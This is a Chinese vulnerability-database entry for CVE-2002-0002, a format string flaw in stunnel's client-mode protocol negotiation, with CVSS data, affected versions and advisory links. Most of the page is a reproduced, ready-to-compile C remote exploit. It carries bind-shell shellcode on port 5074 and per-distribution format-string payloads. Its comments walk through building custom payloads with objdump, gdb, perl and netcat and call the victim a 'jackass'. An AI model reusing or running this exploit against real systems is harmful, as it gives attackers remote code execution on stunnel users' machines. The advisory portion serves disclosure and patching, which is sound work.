CVE-2002-0002
CVSS7.5
发布时间 :2002-01-31 00:00:00
修订时间 :2016-10-17 22:15:24
NMCOEP    

[原文]Format string vulnerability in stunnel before 3.22 when used in client mode for (1) smtp, (2) pop, or (3) nntp allows remote malicious servers to execute arbitrary code.


[CNNVD]STunnel客户端协商协议格式串溢出漏洞(CNNVD-200201-020)

        
        Stunnel是一款允许用户加密任意TCP会话连接的程序,能使非SSL加密应用程序和服务使用SSL加密。
        Stunnel没有正确处理用户提供的输入,远程攻击者可以利用这个漏洞提供包含恶意格式字符串的请求给Stunnel服务,可能以Stunnel进程在系统上执行任意指令。
        如果用户在客户端以'-n smtp'、'-n pop'、'-n nntp'选项运行Stunnel服务,由于对输入检查不充分,攻击者可以对其进行格式串攻击,精心提交恶意格式串数据可以覆盖堆栈任何内容,以Stunnel进程权限在系统上执行任意指令。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:7.2Red Hat Linux 7.2
cpe:/a:stunnel:stunnel:3.9
cpe:/a:stunnel:stunnel:3.10
cpe:/a:stunnel:stunnel:3.21c
cpe:/a:stunnel:stunnel:3.8
cpe:/a:stunnel:stunnel:3.11
cpe:/a:stunnel:stunnel:3.21b
cpe:/a:stunnel:stunnel:3.7
cpe:/a:stunnel:stunnel:3.21a
cpe:/a:stunnel:stunnel:3.12
cpe:/a:stunnel:stunnel:3.13
cpe:/a:stunnel:stunnel:3.14
cpe:/a:stunnel:stunnel:3.15
cpe:/a:stunnel:stunnel:3.3
cpe:/o:engardelinux:secure_linux:1.0.1Engarde Secure Linux 1.0.1
cpe:/a:stunnel:stunnel:3.20
cpe:/a:stunnel:stunnel:3.21
cpe:/a:stunnel:stunnel:3.22
cpe:/a:stunnel:stunnel:3.16
cpe:/a:stunnel:stunnel:3.17
cpe:/a:stunnel:stunnel:3.18
cpe:/a:stunnel:stunnel:3.19
cpe:/o:mandrakesoft:mandrake_linux:8.1MandrakeSoft Mandrake Linux 8.1
cpe:/a:stunnel:stunnel:3.24
cpe:/a:stunnel:stunnel:3.4a

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0002
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2002-0002
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200201-020
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=stunnel-users&m=100869449828705&w=2
(UNKNOWN)  MISC  http://marc.info/?l=stunnel-users&m=100869449828705&w=2
http://online.securityfocus.com/archive/1/247427
(UNKNOWN)  BUGTRAQ  20011227 Stunnel: Format String Bug in versions <3.22
http://online.securityfocus.com/archive/1/248149
(UNKNOWN)  BUGTRAQ  20020102 Stunnel: Format String Bug update
http://stunnel.mirt.net/news.html
(VENDOR_ADVISORY)  CONFIRM  http://stunnel.mirt.net/news.html
http://www.linux-mandrake.com/en/security/2002/MDKSA-2002-004.php3
(UNKNOWN)  MANDRAKE  MDKSA-2002:004
http://www.redhat.com/support/errata/RHSA-2002-002.html
(VENDOR_ADVISORY)  REDHAT  RHSA-2002:002
http://www.securityfocus.com/bid/3748
(UNKNOWN)  BID  3748
http://xforce.iss.net/xforce/xfdb/7741
(UNKNOWN)  XF  stunnel-client-format-string(7741)

- 漏洞信息

STunnel客户端协商协议格式串溢出漏洞
高危 输入验证
2002-01-31 00:00:00 2006-09-05 00:00:00
远程  
        
        Stunnel是一款允许用户加密任意TCP会话连接的程序,能使非SSL加密应用程序和服务使用SSL加密。
        Stunnel没有正确处理用户提供的输入,远程攻击者可以利用这个漏洞提供包含恶意格式字符串的请求给Stunnel服务,可能以Stunnel进程在系统上执行任意指令。
        如果用户在客户端以'-n smtp'、'-n pop'、'-n nntp'选项运行Stunnel服务,由于对输入检查不充分,攻击者可以对其进行格式串攻击,精心提交恶意格式串数据可以覆盖堆栈任何内容,以Stunnel进程权限在系统上执行任意指令。
        

- 公告与补丁

        暂无数据

- 漏洞信息 (21192)

STunnel 3.x Client Negotiation Protocol Format String Vulnerability (EDBID:21192)
linux remote
2001-12-22 Verified
0 deltha
N/A [点击下载]
source: http://www.securityfocus.com/bid/3748/info

Stunnel is a freely available, open source cryptography wrapper. It is designed to wrap arbitrary protocols that may or may not support cryptography. It is maintained by the Stunnel project.

Stunnel does not properly handle unexpected input by users. When a protocol is initiated between a client and the server, it is possible to supply a format string to the Stunnel server that may result in the execution of arbitrary code. 

/*
 * Stunnel < 3.22 remote exploit
 * by ^sq/w00nf - deltha [at] analog.ro
 * Contact: deltha@analog.ro
 * Webpage: http://www.w00nf.org/^sq/
 *
 * ey ./w00nf-stunnel contribs - kewlthanx :
 * nesectio, wsxz, soletario, spacewalker, robin, luckyboy, hash, nobody, ac1d, and not @ the end: bajkero
 *
 * You also need netcat and format strings build utility (from my webpage)
 * Compile: gcc -w -o w00nf-stunnel w00nf-stunnel.c
 *
 *   .   .  .. ......................................... ...
 *  .                         ____  ____        _____        :.:.:
 *  :               _      __/ __ \/ __ \____  / __/           :..
 *  :..            | | /| / / / / / / / / __ \/ /_               :
 *  ..:..          | |/ |/ / /_/ / /_/ / / / / __/               :
 *  :.: :..        |__/|__/\____/\____/_/ /_/_/                  .
 *  : :   :..
 *  :.: :............................................... ..  .   . 
 *                           T . E . A . M      
 * 
 * POC - Tested remotely on linux 
 * Stunnel is a program that allows you to encrypt arbitrary TCP connections inside SSL 
 * Visit http://www.stunnel.org for details
 *
 * I didn't add a search function or bruteforce attack because the vulnerability does'nt allow you
 * to grab the remote stack.
 *
 * Description of this exploit:
 * This exploit puts a payload on a specified port. When a remote user connects to your machine 
 * using stunnel on the specified port, the exploit executes this payload and binds a shell to the
 * remote users machine on port 5074.
 * 
 * Summary: 
 * Malicious servers could potentially run code as the owner of an Stunnel process when using 
 * Stunnel's protocol negotiation feature in client mode. 
 *
 * Description of vulnerability: 
 * Stunnel is an SSL wrapper able to act as an SSL client or server, 
 * enabling non-SSL aware applications and servers to utilize SSL encryption. 
 * In addition, Stunnel has the ability to perform as simple SSL encryption/decryption 
 * engine. Stunnel can negotiate SSL with several other protocols, such as 
 * SMTP's "STARTTLS" option, using the '-n protocolname' flag. Doing so 
 * requires that Stunnel watches the initial protocol handshake before 
 * beginning the SSL session. 
 * There are format string bugs in each of the smtp, pop, and nntp 
 * client negotiations as supplied with Stunnel versions 3.3 up to 3.21c. 
 *
 * No exploit is currently known, but the bugs are most likely exploitable. 
 * 
 * Impact: 
 * If you use Stunnel with the '-n smtp', '-n pop', '-n nntp' options 
 * in client mode ('-c'), a malicous server could abuse the format 
 * string bug to run arbitrary code as the owner of the Stunnel 
 * process. The user that runs Stunnel depends on how you start 
 * Stunnel. It may or may not be root -- you will need to check 
 * how you invoke Stunnel to be sure. 
 * There is no vulnerability unless you are invoking Stunnel with 
 * the '-n smtp', '-n pop', or '-n nntp' options in client mode. 
 * There are no format string bugs in Stunnel when it is running as an SSL 
 * server. 
 *
 * Mitigating factors: 
 * If you start Stunnel as root but have it change userid to some other 
 * user using the '-s username' option, the Stunnel process will be 
 * running as 'username' instead of root when this bug is triggered. 
 * If this is the case, the attacker can still trick your Stunnel process 
 * into running code as 'username', but not as root. 
 * Where possible, we suggest running Stunnel as a non-root user, either 
 * using the '-s' option or starting it as a non-privileged user. 
 *
 * Triggering this vulnerability - example for kidz:
 * Obtain a shell account on to-be-hacked's server and perform the following commands:
 * sq@cal013102: whereis stunnel
 * stunnel: /usr/sbin/stunnel
 * change directory to where is stunnel
 * Obtain vsnprintf's R_386_JUMP_SLOT:
 * sq@cal013102:~/stunnel-3.20$ /usr/bin/objdump --dynamic-reloc ./stunnel |grep printf
 * 08053470 R_386_JUMP_SLOT   fprintf
 * ---->080534a8 R_386_JUMP_SLOT   vsnprintf
 * 080535a4 R_386_JUMP_SLOT   snprintf
 * 08053620 R_386_JUMP_SLOT   sprintf
 * open 2 terminals
 * in the first terminal make netcat connect to a port (eg 252525)
 * sq@cal013102:~/stunnel-3.20$ nc -p 252525 -l 
 * in the second terminal (remote) simulate attack 
 * ./stunnel -c -n smtp -r localhost:252525
 * in the first terminal with nc insert a specially crafted string to grep eatstack value
 * AAAABBBB%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|%x|
 * in the second terminal (remote) it will return the stack values and see at which position 
 * 41414141 and 424242 appeared
 * AAAABBBB|bffff868|bffffb60|bffffece|bffffed3|80503ae|40275580|4016bfc4|
 * 4027f3c4|41414141|42424242|257c7825|78257c78|7c78257c|
 * 257c7825|78257c78|7c78257c| ->414141=9 and 424242=10
 * try again with to see if eatstack value is 9 AAAABBBB%9$x%10$x and it will return AAAABBBB4141414142424242
 * put the address obtained with objdump in hex little endian format \xa8\x34\x05\x08 and last value +2 \xaa\x34\x05\x08
 * (a8+2=aa) and generate the decimal value of format string after you got the middle of nops value on stack 0xbffff89b
 * with build, a program attached to this exploit.
 * ./build 080534a8 0xbffff89b 9
 * adr : 134558888 (80534a8)
 * val : -1073743717 (bffff89b)
 * valh: 49151 (bfff)
 * vall: 63643 (f89b)
 * [��%.49143x%9$hn%.14492x%10$hn] (35)
 * ��%.49143x%9$hn%.14492x%10$hn
 * The resulting string is %.49143x%9$hn%.14492x%10$hn -> 
 * "'`%.32759u%9\$hn%.32197u%10\$hn replace eatstack 10 with 9 otherwise it won't work
 * eg "'`%.32759u%10\$hn%.32197u%9\$hn
 * Put the payload in a file echo `perl -e 'print "\xc4\x35\x05\x08\xc6\x35\x05\x08"'`%.32759u%10\$hn%.32197u%9\$hn > x
 * Bind the payload to a port ./netcat -p 252525 -l <x
 * Simulate the payload attack ./stunnel -c -n smtp -r localhost:252525
 * Add your own crafted format in the exploit:
 * char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; 080534a8 vsnprintf
 * char fmtYOUROWN[]="";   R_386_JUMP_SLOT  vsnprintf 
 * Simulate the payload attack with this exploit ./w00nf-stunnel -t 6 -p 252525 t6 would be your custom payload
 * after you added your string in the exploit.
 * If stunnel was compiled with gdb support and you set ulimit -c 9024 or whatever to coredump on your terminal
 * then stunnel will coredump if you didn't guess the exact stackvalue in the middle of nops.
 * If stunnel wasn't compiled with gdb support then download it from the stunnel website
 * and compile with gdb support. 
 * Once you have downloaded it run './configure edit Makefile' , and where you see 'CFLAGS' add '-g -ggdb3'
 * eg. 'cat Makefile |grep CFLAGS'
 * CFLAGS=-g -ggdb3 -O2 -Wall -I/usr/local/ssl/include  -DVERSION=\"3.20\" -DHAVE_OPENSSL=1 -Dssldir=\"/usr/local/ssl\"
 * -DPEM_DIR=\"\" -DRANDOM_FILE=\"/dev/urandom\" -DSSLLIB_CS=0 -DHOST=\"i586-pc-linux-gnu\" -DHAVE_LIBDL=1  
 * DHAVE_LIBPTHREAD=1 -DHAVE_LIBUTIL=1 -DHAVE_LIBWRAP=1 etcetc
 * Open core in gdb sq@cal013102:~/stunnel-3.20$gdb ./stunnel core.2411
 * x/10i $esp and press enter a couple of times till you find 'nop nop nop nop nop nop'.
 * Get the stack address in the middle of nops, 0xbffff89b is my address
 * and build (9 is eatstack) again with the ./build utility
 * Rebuild and repeat.
 * ./build 080534a8 0xbffff89b 9
 * Put the payload in a file echo `perl -e 'print "\xc4\x35\x05\x08\xc6\x35\x05\x08"'`%.32759u%10\$hn%.32197u%9\$hn > x
 * ./w00nf-stunnel -t 6 -p 252525 t6 is your custom payload and it will bind a shell on 5074 :)
 * If it worked then add your own crafted format in the exploit
 * char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn";  080534a8 vsnprintf
 * char fmtYOUROWN[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn";   R_386_JUMP_SLOT  vsnprintf 
 *
 */

#include <fcntl.h>
#include <netdb.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <getopt.h>
#include <stdlib.h>
#include <memory.h>
#include <errno.h>
#include <syslog.h>

int MAX;
char linuxshellcode[] =
                                        /*   <priv8security>: bind@5074 */
	"\x90\x90\x90\x90\x90"          /*   nop	                */
	"\x90\x90\x90\x90\x90"          /*   nop		        */
	"\x90\x90\x90\x90\x90"          /*   nop	                */
	"\x90\x90\x90\x90\x90"          /*   nop	                */
	"\x90\x90\x90\x90\x90"          /*   nop	                */
	"\x90\x90\x90\x90\x90"          /*   nop	                */
	"\x90\x90\x90\x90\x90"          /*   nop	                */
	"\x90\x90\x90\x90\x90"          /*   nop	                */
	"\x90\x90\x90\x90\x90"          /*   nop	                */
	"\x90\x90\x90\x90\x90"          /*   nop	                */
	"\x90\x90\x90\x90\x90"          /*   nop	                */
	"\x90\x90\x90\x90\x90"          /*   nop	                */
	"\x90\x90\x90\x90\x90"          /*   nop	                */
	"\x90\x90\x90\x90\x90"          /*   nop	                */
	"\x90\x90\x90\x90\x90\x90"     	/*   nop	                */
        "\x31\xc0"                      /*   xor    %eax,%eax           */
        "\x50"                          /*   push   %eax                */
        "\x40"                          /*   inc    %eax                */
        "\x89\xc3"                      /*   mov    %eax,%ebx           */
        "\x50"                          /*   push   %eax                */
        "\x40"                          /*   inc    %eax                */
        "\x50"                          /*   push   %eax                */
        "\x89\xe1"                      /*   mov    %esp,%ecx           */
        "\xb0\x66"                      /*   mov    $0x66,%al           */
        "\xcd\x80"                      /*   int    $0x80               */
        "\x31\xd2"                      /*   xor    %edx,%edx           */
        "\x52"                          /*   push   %edx                */
        "\x66\x68\x13\xd2"              /*   pushw  $0xd213             */
        "\x43"                          /*   inc    %ebx                */
        "\x66\x53"                      /*   push   %bx                 */
        "\x89\xe1"                      /*   mov    %esp,%ecx           */
        "\x6a\x10"                      /*   push   $0x10               */
        "\x51"                          /*   push   %ecx                */
        "\x50"                          /*   push   %eax                */
        "\x89\xe1"                      /*   mov    %esp,%ecx           */
        "\xb0\x66"                      /*   mov    $0x66,%al           */
        "\xcd\x80"                      /*   int    $0x80               */
        "\x40"                          /*   inc    %eax                */
        "\x89\x44\x24\x04"              /*   mov    %eax,0x4(%esp,1)    */
        "\x43"                          /*   inc    %ebx                */
        "\x43"                          /*   inc    %ebx                */
        "\xb0\x66"                      /*   mov    $0x66,%al           */
        "\xcd\x80"                      /*   int    $0x80               */
        "\x83\xc4\x0c"                  /*   add    $0xc,%esp           */
        "\x52"                          /*   push   %edx                */
        "\x52"                          /*   push   %edx                */
        "\x43"                          /*   inc    %ebx                */
        "\xb0\x66"                      /*   mov    $0x66,%al           */
        "\xcd\x80"                      /*   int    $0x80               */
        "\x93"                          /*   xchg   %eax,%ebx           */
        "\x89\xd1"                      /*   mov    %edx,%ecx           */
        "\xb0\x3f"                      /*   mov    $0x3f,%al           */
        "\xcd\x80"                      /*   int    $0x80               */
        "\x41"                          /*   inc    %ecx                */
        "\x80\xf9\x03"                  /*   cmp    $0x3,%cl            */
        "\x75\xf6"                      /*   jne    80a035d <priv8security+0x3d>        */
        "\x52"                          /*   push   %edx                */
        "\x68\x6e\x2f\x73\x68"          /*   push   $0x68732f6e         */
        "\x68\x2f\x2f\x62\x69"          /*   push   $0x69622f2f         */
        "\x89\xe3"                      /*   mov    %esp,%ebx           */
        "\x52"                          /*   push   %edx                */
        "\x53"                          /*   push   %ebx                */
        "\x89\xe1"                      /*   mov    %esp,%ecx           */
        "\xb0\x0b"                      /*   mov    $0xb,%al            */
        "\xcd\x80";                     /*   int    $0x80               */

char fmtRH72[]="\x50\x71\x05\x08\x52\x71\x05\x08%.49143x%4\$hn%.12881x%3\$hn"; /* 08057150 R_386_JUMP_SLOT   vsnprintf */
char fmtRH73[]="\xe8\x69\x05\x08\xea\x69\x05\x08%.49143x%4\$hn%.12982x%3\$hn"; /* 080569e8 R_386_JUMP_SLOT   vsnprintf */
char fmtRH80[]="\x28\x69\x05\x08\x2a\x69\x05\x08%.49143x%4\$hn%.12815x%3\$hn"; /* 08056928 R_386_JUMP_SLOT   vsprintf */
char fmtMDK90[]="\xf8\x23\x05\x08\xfa\x23\x05\x08%.49143x%4\$hn%.13321x%3\$hn"; /* 080523f8 R_386_JUMP_SLOT   vsnprintf */
char fmtSLACK81[]="\xdc\x69\x05\x08\xde\x69\x05\x08%.49143x%10\$hn%.12082x%9\$hn"; /* 080569dc R_386_JUMP_SLOT  vsnprintf */
char fmtDEBIAN30[]="\xa8\x34\x05\x08\xaa\x34\x05\x08%.49143x%10\$hn%.14492x%9\$hn"; /* 080534a8 R_386_JUMP_SLOT  vsnprintf */
char fmtYOUROWN[]=""; /*  R_386_JUMP_SLOT  vsnprintf */
        
char    c;
struct  os {
    int num;
    char *ost;
    char *shellcode;
    char *format;
    int flag;
};
 
struct os plat[] =
{
    {
        0,"Red Hat Linux release 7.2 stunnel-3.20.tar.gz",
        linuxshellcode,fmtRH72,11
    },
    {
        1,"Red Hat Linux release 7.3 stunnel-3.20.tar.gz",
        linuxshellcode,fmtRH73,11
    },
    {
        2,"Red Hat Linux release 8.0 stunnel-3.20.tar.gz",
        linuxshellcode,fmtRH80,11
    },
    {
        3,"Mandrake Linux release 9.0 stunnel-3.20.tar.gz",
        linuxshellcode,fmtMDK90,11
    },
    {
        4,"Slackware Linux release 8.1 stunnel-3.20.tar.gz",
        linuxshellcode,fmtSLACK81,5
    },
    {
        5,"Debian GNU release 3.0 stunnel-3.20.tar.bz2",
        linuxshellcode,fmtDEBIAN30,5
    },
    {
        6,"Your custom distro stunnel-3.20.tar.bz2",
        linuxshellcode,fmtYOUROWN,5
    }
    
};

void usage(char *argument);
int main(argc,argv)
    int argc;
    char *argv[];
{

int type=0;
int flag=plat[type].flag;
extern char *optarg;
int cnt;
char    newstring[300];
int     port = 994;
const char* sploitdata_filename = "sploitdata.spl";     
static        int fd[2];
static        pid_t childpid;
static        char str_port[6];

void write_sploit_data (char* entry)
    {
    int fd = open (sploitdata_filename, O_WRONLY | O_CREAT | O_APPEND, 0660);
    write (fd, entry, strlen (entry));
    write (fd, "\n", 1);
    fsync (fd);
    close (fd);
    }
      if(argc == 1) 
                    usage(argv[0]);
      if(argc == 2) 
                    usage(argv[0]);
      if(argc == 3) 
                    usage(argv[0]);
        while ((c = getopt(argc, argv, "h:p:t:v")) > 0 ){
                switch (c) {
                case 't':
                        type = atoi(optarg);
                        if(type>6) /* 0,1,2,3,4,5,6 */
                        {
                        (void)usage(argv[0]);
                        }
                        break;
                case 'p':
                        port = atoi(optarg);
                        break;
                case 'h':
                        usage(argv[0]);
                case '?':
                case ':':
                        exit(-1);
                }
        }
        MAX=strlen(plat[type].format)+strlen(plat[type].shellcode);
        fprintf(stdout,"Remote exploit for STUNNEL <3.22\nby ^sq/w00nf - deltha [at] analog.ro\n");
        fprintf(stdout,"[*] target: %s\n",plat[type].ost);
        fprintf(stdout,"[*] maxlenght: %d\n", MAX);
        unlink (sploitdata_filename);
        strcpy(newstring, plat[type].format);
        strcat(newstring, plat[type].shellcode);
        write_sploit_data(newstring);
        sprintf((char *) &str_port, "%d", port);
        printf("[*] host: localhost\n");
        printf("[*] port: %s\n", str_port);             
        printf("[*] waiting: jackass should connect to our port\n");
        printf("[*] next: after he connects press ctrl-c\n");       
        printf("[*] next: you should try to connect to his port 5074 - nc 1.2.3.4 5074\n");               
        pipe(fd);
        if (( childpid=fork())==0) { /* cat is the child */
                dup2(fd[1],STDOUT_FILENO);
                close(fd[0]);
                close(fd[1]);
                execl("/bin/cat","cat",sploitdata_filename,NULL);
                perror("The exec of cat failed");
        } else {                      /* netcat is the parent */

                dup2(fd[0], STDIN_FILENO);
                close(fd[0]);
                close(fd[1]);
                execl("/usr/bin/nc", "nc", "-n", "-l", "-p", str_port, NULL);
                perror("the exec of nc failed");
        }
        printf("[*] next: now you should try to connect to his port 5074\n");               
        exit(0);
}

void usage(char *argument)
{
	fprintf(stdout,"Usage: %s -options arguments\n",argument);
	fprintf(stdout,"Remote exploit for STUNNEL <3.22\n"
	"by ^sq/w00nf - deltha [at] analog.ro\nUsage: %s [-p <port> -t <targettype>]\n"
	"\t-p <port> - Local binded port where the remote stunnel connects\n"
	"\t-t <target> - Target type number\n", argument);
        fprintf(stdout,"\t-Target Type Number List-\n");
    fprintf(stdout," {0} Red Hat Linux release 7.2 "
	    " stunnel-3.20.tar.gz\n");
    fprintf(stdout," {1} Red Hat Linux release 7.3 "
	    " stunnel-3.20.tar.gz\n");
    fprintf(stdout," {2} Red Hat Linux release 8.0 "
	    " stunnel-3.20.tar.gz\n");
    fprintf(stdout," {3} Mandrake Linux release 9.0 "
	    " stunnel-3.20.tar.gz\n");
    fprintf(stdout," {4} Slackware Linux release 8.1 "
	    " stunnel-3.20.tar.gz\n");
    fprintf(stdout," {5} Debian GNU release 3.0 "
	    " stunnel-3.20.tar.gz\n");
    fprintf(stdout," {6} Your custom distro "
	    " stunnel-3.20.tar.gz\n");
    fprintf(stdout," Example1: %s -t 1 -p 252525\n",argument);
	exit(0);
}		

- 漏洞信息 (F30736)

w00nf-stunnel.c (PacketStormID:F30736)
2003-01-17 00:00:00
^sq/w00nf  w00nf.org
exploit,remote
linux,redhat,slackware,debian,mandrake
CVE-2002-0002
[点击下载]

Stunnel v3.15 - 3.21 remote format string exploit. Tested against Red Hat 7.2, 7.3, 8.0, Slackware 8.1, Debian GNU 3.0, and Mandrake 9.0. More information on the bug available here.

- 漏洞信息

2012
Stunnel -n Option Client Negotiation Protocol Remote Format String
Context Dependent Input Manipulation
Loss of Integrity Upgrade
Exploit Public Vendor Verified, Third-party Verified

- 漏洞描述

- 时间线

2001-12-21 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 3.22 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站